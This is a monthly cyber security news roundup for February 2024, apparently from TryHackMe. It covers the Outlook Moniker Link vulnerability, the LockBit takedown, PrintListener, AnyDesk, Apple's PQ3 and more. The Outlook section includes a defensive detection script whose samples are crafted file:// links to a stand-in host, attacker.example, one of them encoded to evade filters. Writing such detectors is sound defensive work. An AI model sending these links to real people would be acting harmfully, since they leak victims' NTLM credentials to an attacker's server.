We’ve compiled some of the biggest news stories from the world of cyber security this month, including a new Microsoft Outlook vulnerability, the global law-enforcement crackdown on the LockBit ransomware gang, a side-channel attack that turns swipe sounds into partial fingerprints, Apple introducing a ‘groundbreaking’ post-quantum cryptographic protocol, and the very latest updates from TryHackMe. Plus much, much more!
Keep reading for your monthly industry updates from February 2024.
New Microsoft Outlook vulnerability (CVE-2024-21413)
On February 13th, 2024 (February’s Patch Tuesday), Microsoft disclosed and patched a Microsoft Outlook vulnerability, CVE-2024-21413, nicknamed ‘Moniker Link’. It allows remote code execution and, even when exploitation stops short of that, leaks the victim’s NTLM credentials simply by having them click a crafted link in an email. Haifei Li of Check Point Research is credited with discovering the vulnerability.
TryHackMe’s new Recent Threats room, Moniker Link (CVE-2024-21413), explores:
- How the vulnerability works
- Outlook’s ‘Protected View’
- How you can detect this attack
- Mitigation measures
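As an added illustration of the detection point above (this is not the room’s content or Check Point’s code), the snippet below scans email bodies for the link shape that Check Point’s public write-up describes: a `file://` hyperlink whose path carries a `!`, which turns the link into a COM moniker and bypasses the Protected View restrictions Outlook would otherwise apply to file links, leaking the user’s NTLM hash to the attacker’s SMB host. The sample bodies and the host name `attacker.example` are constructed for the example.

```python
import re
from html import unescape

# Public detail from Check Point Research's write-up of CVE-2024-21413:
# Outlook restricts plain "file://" hyperlinks, but appending "!" to the path
# turns the link into a COM moniker and bypasses that check. A plain "file://"
# link is therefore NOT flagged here; only the "!" variant is.
# Triple-quoted raw string so the quote characters need no escaping.
MONIKER_LINK = re.compile(r'''file:(?://)?[^\s"'<>]*![^\s"'<>]*''', re.IGNORECASE)


def find_moniker_links(body: str) -> list:
    """Return every file:// link containing a '!' in an email body.

    HTML entities are decoded first so that an attacker cannot hide the
    bang as '&#33;' inside an HTML mail body.
    """
    return [m.group(0) for m in MONIKER_LINK.finditer(unescape(body))]


def is_suspicious(body: str) -> bool:
    """True when the body contains at least one Moniker Link style URL."""
    return bool(find_moniker_links(body))


# Constructed sample bodies for the example (not real mail).
SAMPLES = {
    "benign_https": '<a href="https://tryhackme.com/room/example">report</a>',
    # Ordinary file share link: Outlook already warns on these, no "!" present.
    "benign_file": r'<a href="file:///\\fileserver\share\report.docx">report</a>',
    # The bypass shape: UNC path followed by "!" and an arbitrary item name.
    "moniker": r'<a href="file:///\\attacker.example\share\test.rtf!something">click</a>',
    # Same thing with the "!" entity-encoded to evade naive string matching.
    "moniker_encoded": r'<a href="file:///\\attacker.example\share\x.rtf&#33;y">click</a>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:16} suspicious={is_suspicious(body)} {find_moniker_links(body)}")
```

Run against a mail gateway’s HTML/RTF bodies this gives a cheap first-pass indicator; the definitive confirmation is an outbound SMB connection from the Outlook host to an external address, which is also why blocking outbound TCP 445 at the perimeter is the usual network-side mitigation.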
Global crackdown success: LockBit ransomware ring dismantled by National Crime Agency
Following on from last month's discussion on LockBit, there's significant news: their operations have been effectively disrupted through a concerted global law enforcement effort. Two LockBit affiliates were arrested in Poland and Ukraine, and over 200 cryptocurrency accounts linked to the gang were frozen. The crackdown also produced a decryption tool, now available for free, to help victims recover their encrypted files.
The operation, named Operation Cronos, was led by the UK National Crime Agency and involved law enforcement from multiple countries. It compromised LockBit's own infrastructure, taking down 34 servers across several nations and seizing critical data, including over 1,000 decryption keys. LockBit has been responsible for numerous high-profile ransomware attacks worldwide.
Their dark web leak site, the ‘wall of shame’ on which they named victims who refused to pay, is now under the control of the UK, the US and the Cronos task force.
This marks a hopeful advancement in the ongoing battle against ransomware criminals, significantly impacting LockBit's ability to operate.
PrintListener: transforming swipe sounds into partial fingerprints
Researchers from China and the U.S. have developed a novel side-channel attack named PrintListener, targeting biometric fingerprint security systems.
By analysing the sound of finger friction on a touchscreen, captured for example through the microphone during a voice or video call, they can extract fingerprint pattern features. The technique achieved a success rate of up to 27.9% for partial fingerprints and 9.3% for complete fingerprints within five attempts, even at the strictest false-acceptance setting tested. This poses a significant threat to the widely trusted and rapidly growing fingerprint authentication market, projected to reach nearly $100 billion by 2032.
The researchers had to overcome several challenges to make the attack practical, such as isolating the influence of the finger pattern from other noise in the recording and inferring secondary fingerprint features from the primary ones they could recover, and the resulting method significantly outperforms traditional MasterPrint fingerprint dictionary attacks.
AnyDesk incident response (5 February 2024)
AnyDesk issued a statement on February 5, 2024, following up on their initial public notice regarding a cyber incident from February 2, 2024. They assured users that immediate steps were taken to investigate and mitigate the incident and that they were cooperating with relevant authorities.
AnyDesk confirms that all versions of their software obtained from official sources remain safe to use, specifically recommending the latest versions 7.0.15 and 8.0.8, which are signed with a new code-signing certificate because the previous one was being revoked as part of the response. Additionally, they implemented a forced password reset for their customer portal (my.anydesk.com) as a precaution, stating there is no evidence of customer data exfiltration or end-user devices being affected.
AnyDesk emphasizes transparency, integrity, and trust in its products and acknowledges the limitations in immediate information disclosure following a cyber incident. An FAQ section has been set up on their website to address customer concerns and correct any misinformation. Contact information for further inquiries is provided via email and phone.
Apple introduces ‘groundbreaking’ post-quantum cryptographic protocol
Apple has just introduced PQ3, a groundbreaking post-quantum cryptographic protocol for iMessage, marking a significant upgrade in cryptographic security.
Apple ranks this protocol at ‘Level 3’ on its own scale of messaging security, the highest level currently achieved by a messaging app, offering protection against both current threats and potential future quantum computing attacks.
PQ3 is characterised by its use of post-quantum cryptography for both initial key establishment and ongoing message exchange. In Apple’s scale that sets it apart from apps that lack end-to-end encryption by default (Level 0), that offer end-to-end encryption without quantum security (Level 1), or that apply post-quantum cryptography only to the initial key establishment (Level 2).
PQ3 represents a major advancement over iMessage's previous updates, which included the switch to Elliptic Curve cryptography (ECC) and enhanced protection of encryption keys with the Secure Enclave. The new protocol combines the Kyber post-quantum key encapsulation mechanism with ECC key agreement in a hybrid design, so an attacker would have to break both to recover a key. It also features a novel post-quantum rekeying mechanism: fresh post-quantum key material is periodically mixed into the session, so that a compromise of the current keys is self-healed and future messages are protected again.
The development of PQ3 involved rigorous testing and formal verification by leading experts in cryptography, confirming its security against both classical and quantum adversaries. The protocol's design ensures that it adds post-quantum confidentiality to iMessage, providing users with assurance of the privacy of their communications in the face of advancements in quantum computing technology. This initiative underscores Apple's commitment to pioneering advanced cryptographic protections and maintaining iMessage's status as a leader in secure messaging technologies.
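To make the self-healing rekeying property concrete, here is an added simulation (not Apple’s PQ3 code, and deliberately not a post-quantum implementation) in which a per-message symmetric ratchet is periodically refreshed with a new shared secret. The fresh secret stands in for the post-quantum encapsulation PQ3 performs; the attacker copies the sender’s state at one point and tries to keep deriving message keys. The root key and the rekey secret are constructed values, and the key schedule (HMAC-SHA256 with fixed labels) is an assumption of this example, not PQ3’s actual one.

```python
import hashlib
import hmac


def kdf(key: bytes, label: bytes) -> bytes:
    """One-way derivation step: HMAC-SHA256 keyed with the current secret."""
    return hmac.new(key, label, hashlib.sha256).digest()


class SymmetricRatchet:
    """Per-message symmetric ratchet.

    Each message key is derived from the chain key, then the chain key
    advances one-way, so earlier keys cannot be recovered from the
    current state (forward secrecy). Without rekeying, however, anyone
    holding the current chain key can derive every FUTURE message key.
    """

    def __init__(self, chain_key: bytes) -> None:
        self.chain_key = chain_key

    def next_message_key(self) -> bytes:
        message_key = kdf(self.chain_key, b"message-key")
        self.chain_key = kdf(self.chain_key, b"chain-key")
        return message_key

    def rekey(self, fresh_shared_secret: bytes) -> None:
        """Mix a freshly negotiated shared secret into the chain.

        In PQ3 this secret comes from a new post-quantum key encapsulation
        combined with ECDH; here it is a constructed byte string that the
        attacker never learns, which is exactly what restores security.
        """
        self.chain_key = kdf(self.chain_key, b"rekey" + fresh_shared_secret)


def simulate_compromise(compromise_at: int, rekey_at: int, n_messages: int) -> list:
    """Return, per message, whether an attacker who copied the sender's
    chain key just before message `compromise_at` derives the right key.

    A rekey scheduled at the same index as the compromise happens first.
    Pass rekey_at=-1 to simulate a session that never rekeys.
    """
    # Constructed values for the example; real sessions use random secrets.
    root_key = hashlib.sha256(b"constructed session root key").digest()
    fresh_secret = hashlib.sha256(b"constructed post-quantum rekey secret").digest()

    sender = SymmetricRatchet(root_key)
    attacker = None
    results = []
    for i in range(n_messages):
        if i == rekey_at:
            sender.rekey(fresh_secret)  # attacker cannot follow: no fresh_secret
        if i == compromise_at:
            attacker = SymmetricRatchet(sender.chain_key)  # state stolen here
        real_key = sender.next_message_key()
        if attacker is None:
            results.append(False)
        else:
            results.append(attacker.next_message_key() == real_key)
    return results


if __name__ == "__main__":
    print("no rekey:   ", simulate_compromise(compromise_at=2, rekey_at=-1, n_messages=8))
    print("rekey at 5: ", simulate_compromise(compromise_at=2, rekey_at=5, n_messages=8))
```

In the first run the attacker recovers every message key from the compromise onward; in the second, the rekey at message 5 cuts the attacker off, which is the “self-healing” the section describes. The one-way chain step is also why keys from before the compromise stay unrecoverable in both runs.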
Toothbrushes used in massive DDoS attack?
Taking a break from all the drama, a translation mishap stemming from an interview with Fortinet led to widespread scepticism among cyber security experts.
This incident revolved around a story about 3 million electric toothbrushes being implicated in a cyber attack, which was initially reported by CH Media and quickly gained international attention.
Despite the intriguing nature of the case, the cyber security community raised doubts, with some dismissing the story as fiction and lacking evidence. Fortinet later clarified that the scenario was hypothetical, used to illustrate a Distributed Denial of Service (DDoS) attack during an interview, and not based on actual research.
This clarification highlighted the challenges in accurately conveying technical examples across languages and cultures, ultimately sparking a dialogue on the importance of precision in cyber security communications.
In the realm of cyber security, this incident has given "brushing up on the facts" a whole new meaning!
TryHackMe’s NEW DevSecOps learning path
This month, TryHackMe also released a brand new DevSecOps learning path, which shows you how to secure modern software development environments with hands-on learning around secure deployments, CI/CD and automation security.
The DevSecOps path covers the core principles and areas needed to build a strong foundation in DevSecOps, giving you the tools to succeed whether you are building a team, aiming to become a DevSecOps Engineer, or simply looking to expand your skill set.
Are you ready to adapt to a new era? Launch our new DevSecOps learning path now!